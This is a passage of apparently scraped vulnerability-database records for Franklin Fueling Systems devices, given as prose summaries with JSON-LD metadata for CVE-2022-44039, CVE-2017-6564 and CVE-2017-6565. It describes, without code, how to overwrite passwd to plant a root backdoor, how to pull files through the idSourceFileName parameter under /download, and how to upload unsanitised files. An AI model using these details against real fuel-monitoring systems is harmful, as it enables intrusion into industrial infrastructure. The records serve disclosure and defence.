
    11 vulnerabilities by franklinfueling

    VAR-202212-0486

    Vulnerability from variot - Updated: 2025-04-25 01:48

    Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). An attacker can overwrite system files such as [system.conf] and [passwd]. This occurs because of the insecure use of the "fopen" system function with the mode "wb", which overwrites the file if it already exists. Overwriting files such as passwd allows an attacker to escalate privileges by planting a backdoor user with root privileges or by changing the root password.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202212-0486",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "colibri",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "franklinfueling",
            "version": "1.9.22.8925"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "cve": "CVE-2022-44039",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-44039",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-44039",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
                "id": "CVE-2022-44039",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202212-2507",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). \u00b6\u00b6 An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of \"fopen\" system function with the mode \"wb\" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          },
          {
            "db": "VULHUB",
            "id": "VHN-441228"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-44039",
            "trust": 1.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-441228",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-441228"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "id": "VAR-202212-0486",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-441228"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-25T01:48:52.113000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-863",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-441228"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://pastebin.com/raw/64stbswu"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-44039/"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-441228"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-441228"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-12-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-441228"
          },
          {
            "date": "2022-12-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          },
          {
            "date": "2022-12-05T21:15:10.280000",
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-12-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-441228"
          },
          {
            "date": "2022-12-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          },
          {
            "date": "2025-04-24T14:15:39.200000",
            "db": "NVD",
            "id": "CVE-2022-44039"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling System Colibri Security hole",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2507"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201705-3685

    Vulnerability from variot - Updated: 2025-04-20 23:29

    On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the Guest user, which has the lowest privileges, can post to the idSourceFileName parameter found within the /download directory. This allows an attacker to download sensitive system files from the host machine, such as databases containing information that can aid in further attacks. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201705-3685",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "franklinfueling",
            "version": "2.3.0.7332"
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": "2.3.0.7332"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          }
        ]
      },
      "cve": "CVE-2017-6564",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2017-6564",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "VHN-114767",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2017-6564",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-6564",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-6564",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201703-389",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-114767",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the Guest user, which contains the lowest privileges, can post to the idSourceFileName parameter found within the /download directory. This ability allows for an attacker to download sensitive system files from the host machine such as databases which contain information that can aid in further attacks. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-6564",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-114767",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "id": "VAR-201705-3685",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-20T23:29:41.897000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "TS-550 evo \u0026 TS-5000 evo",
            "trust": 0.8,
            "url": "http://www.franklinfueling.com/americas/fms/featured/1697/en/ts-550-evo-ts-5000-evo#Highlights"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-862",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://www.u235.io/single-post/2017/05/01/penetrating-fuel-management-systems"
          },
          {
            "trust": 1.7,
            "url": "https://gist.github.com/stick-u235/b187931f828e92866d09b9bdeb956ca2"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6564"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6564"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-05-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "date": "2017-06-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "date": "2017-03-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "date": "2017-05-01T19:59:00.160000",
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114767"
          },
          {
            "date": "2017-06-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-6564"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling Systems TS-550 evo Device access control vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003716"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-389"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201705-3686

    Vulnerability from variot - Updated: 2025-04-20 23:25

    On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the roleDiag user, which can be obtained by exploiting CVE-2013-7247, can upload files to the server hosting the web service. As no sanitization checks are in place, an attacker can upload a malicious payload. Franklin Fueling Systems TS-550 evo is a fuel management system from Franklin Fueling Systems in the United States. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A security vulnerability exists in Franklin Fueling Systems TS-550 evo version 2.3.0.7332.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201705-3686",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "franklinfueling",
            "version": "2.3.0.7332"
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": "2.3.0.7332"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          }
        ]
      },
      "cve": "CVE-2017-6565",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2017-6565",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "VHN-114768",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2017-6565",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
